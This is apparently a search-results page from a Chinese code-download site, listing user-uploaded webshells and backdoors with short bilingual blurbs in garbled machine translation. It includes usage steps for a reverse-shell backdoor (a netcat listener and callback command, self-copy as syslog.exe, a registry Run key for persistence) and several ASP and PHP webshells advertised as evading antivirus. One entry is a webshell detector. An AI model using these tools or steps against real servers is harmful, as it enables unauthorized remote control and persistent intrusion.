Location:
Search - webshell a
Search list
Description: 简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.
程序会复制自身到c:\\winnt\\下名为syslog.exe,并在
HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat - vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \\ winnt \\ named syslog.exe and HKEY_CURRENT_USER \\ \\ Software \\ \\ Microsoft \\ \\ Windows \\ \\ CurrentVe
Platform: |
Size: 12283 |
Author: 张军 |
Hits:
Description: 海阳顶端网 2006+ 正式版
·一个不用FSO组件的ASP的webshell,可以执行浏览目录、移动文件、拷贝文件、任意...
软件类别:其他类别 运行环境:ASP+ACCESS 授权方式:免费版 -Haiyang top network official version of a 2006 FSO components do not have a burst of ASP, implementation can browse catalogs, mobile documents, copies of documents, arbitrary ... software categories : operating environment for other categories : ASP ACCESS license : free version
Platform: |
Size: 945349 |
Author: Kate |
Hits:
Description: google hacking其实并算不上什么新东西,在早几年在一些国外站点上就有过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单-actually not really nothing new, in the past few years in some foreign sites have all relevant, but I did not pay attention to this technology, on the view that the maximum not only to find out the name of mdb or others left a burst of what, little practical purpose. However, carefully avoiding the earlier information before suddenly found Google hacking This is not so simple
Platform: |
Size: 202214 |
Author: 陈淑明 |
Hits:
Description: 简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.
程序会复制自身到c:\winnt\下名为syslog.exe,并在
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
Platform: |
Size: 12288 |
Author: 张军 |
Hits:
Description: 海阳顶端网 2006+ 正式版
·一个不用FSO组件的ASP的webshell,可以执行浏览目录、移动文件、拷贝文件、任意...
软件类别:其他类别 运行环境:ASP+ACCESS 授权方式:免费版 -Haiyang top network official version of a 2006 FSO components do not have a burst of ASP, implementation can browse catalogs, mobile documents, copies of documents, arbitrary ... software categories : operating environment for other categories : ASP ACCESS license : free version
Platform: |
Size: 945152 |
Author: Kate |
Hits:
Description: google hacking其实并算不上什么新东西,在早几年在一些国外站点上就有过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单-actually not really nothing new, in the past few years in some foreign sites have all relevant, but I did not pay attention to this technology, on the view that the maximum not only to find out the name of mdb or others left a burst of what, little practical purpose. However, carefully avoiding the earlier information before suddenly found Google hacking This is not so simple
Platform: |
Size: 201728 |
Author: 陈淑明 |
Hits:
Description: 很多服务程序都是system权限,这个是转换system到admin 的工具-Service procedures are a lot of system privileges, this is a conversion system to the admin tools
Platform: |
Size: 9216 |
Author: 张扬 |
Hits:
Description: 【Wxy小组内部asp-webshell超强版】
详细功能介绍:
1:增加Serv-u加FTP通杀版!
2:增加检测可修改的目录!
3:能准确的查看系统管理员帐户!
4:能检测系统安装了那些可利用软件!
5:增加文件下载功能,直接从网络上下载文件至服务器,这样方便无法上传文件!
6:注册表操作更加详细,让一些不懂操作注册表的用户只需复制粘贴即可查看!
7:详细在顶部提供各类可提权利用的目录,方便大家直接查看!
8.优化代码,使用最新技术 提权成功达90 以上!
具体功能大家自己使用的时候自己体会!
-【Sub-Wxy internal version of asp-webshell Superacid Introduction】 detailed features: 1: to increase FTP add Serv-u version of Qualcomm kill! 2: Detect can be modified to increase the directory! 3: to get a better view of the system administrator account! 4: can detection system which can be used to install software! 5: Increase file download directly from the network to download files on the server, so can not upload files Convenience! 6: Registry operation in more detail, so that some users do not know how to operate the registry only need to copy and paste to see! 7: all kinds of details can be provided at the top of the right to use the directory to facilitate direct view! 8. optimize the code, the right to use the latest technology to more than 90 Successful! The use of specific features of the U.S. when their own experience!
Platform: |
Size: 37888 |
Author: xiaona |
Hits:
Description: 一款以.NET 开发的WEBSHELL 上传木马-A to. NET development WEBSHELL From Trojan
Platform: |
Size: 1024 |
Author: 我是坏人oO |
Hits:
Description: 一个小巧美观的asp 大马,未加密且免杀大部分杀软-Asp a small beautiful Malaysia, unencrypted and free to kill the majority of soft-kill
Platform: |
Size: 13312 |
Author: 浊风 |
Hits:
Description: 原创ASPwebshell,绝对原创,功能模仿主流webshell,具有一般webshell所具有的全部功能,并强化了智能搜索功能。-Original ASPwebshell, absolutely original, functional imitation of the mainstream webshell, has a general webshell possess all the features, and enhanced intelligent search function.
Platform: |
Size: 148480 |
Author: 李长茂 |
Hits:
Description: 一款用JAVA语言编写的类似ASP系统后台管理员的操作界面,可以在这个webshell中得到系统服务器信息(如数据库信息,WEB项目信息),可操作文件系统(文件的常规操作),能执行系统命令(如:cmd操作dos,功能强大)等等,总之是一个强大系统后台web管理工具,内有详细图片介绍-A JAVA language with a similar background ASP system administrator interface, you can get in this webshell system server information (such as database information, WEB project information), operational file system (file regular operation), can perform a system command (eg: cmd operation dos, powerful), etc., in short, is a powerful backend web management tools, there are more photographs
Platform: |
Size: 164864 |
Author: yz |
Hits:
Description: 这是从那儿下载的,一个老外写的webshe-This is downloaded from there, a foreigner writing webshell
Platform: |
Size: 116736 |
Author: 蓝城 |
Hits:
Description: 鼎祥多用户在线客服系统是一款企业级的网站实时交流系统,网站访客只需点击网页中的对话图标,无需安装或者下载任何软件,就能直接和网站客服人员进行即时交流。鼎祥多用户在线客服系统将为企业发掘更多的潜在客户,降低运行成本,提高工作效率,提升客户满意度,是企业进行在线咨询、在线营销、在线客服的有力工具。
修改数据库路径:inc.asp
管理员登陆口:http://你的域名/admin/login.asp
默认管理员账号:admin 密码admin
首页自行修改对应文件-Ding Xiang multi-user online customer service system is an enterprise-class real-time communication system sites, web site visitors simply click on the icon in the dialogue, without having to install or download any software, you can direct and real-time exchange of customer service site. Ding Xiang multi-user online customer service system for enterprises and to identify more potential customers, reduce operating costs, increase efficiency, improve customer satisfaction, is an online business, online marketing, online customer service a powerful tool. Modify the database path: inc.asp administrator login port: http:// to your domain/admin/login.asp default administrator account: admin password admin page modify the corresponding file
Platform: |
Size: 8432640 |
Author: gg126 |
Hits:
Description: 用于远程控制php服务器的一段代码。。php文件。-Php server for remote control of a section of code. . php file.
Platform: |
Size: 5120 |
Author: 钱程序 |
Hits:
Description: 海洋是网站管理员的好帮手,有上传,下载等功能,很好用。-The ocean is a good helper of the site administrator, upload, download, easy to use.
Platform: |
Size: 20480 |
Author: 海神 |
Hits:
Description: ntShell 改进版本,用于远程控制,有文件管理、屏幕管理、Socket代理等,功能较为齐全。-ntShell improved version, for remote control, file management, screen management, Socket Proxy, a more complete
Platform: |
Size: 717824 |
Author: wangwei |
Hits:
Description: php大马webshell一枚,可以在php服务器上使用,功能强大,欢迎大家下载使用,极其适合做后门程序-php Malaysia webshell a php server to use, powerful, welcome to download, extremely suitable for backdoor
Platform: |
Size: 201728 |
Author: 张建启 |
Hits:
Description: 一款无后门免杀asp源码,很正点银河webshell无后门免杀超强-No back door to avoid killing a asp source code, very punctual Galaxy webshell no back door to avoid killing super-
Platform: |
Size: 32768 |
Author: kkjl |
Hits:
Description: webshell后门检测脚本,基于决策树取得很高检测率(a script to find webshell in webserver)
Platform: |
Size: 12288 |
Author: nkvklvfdv3
|
Hits: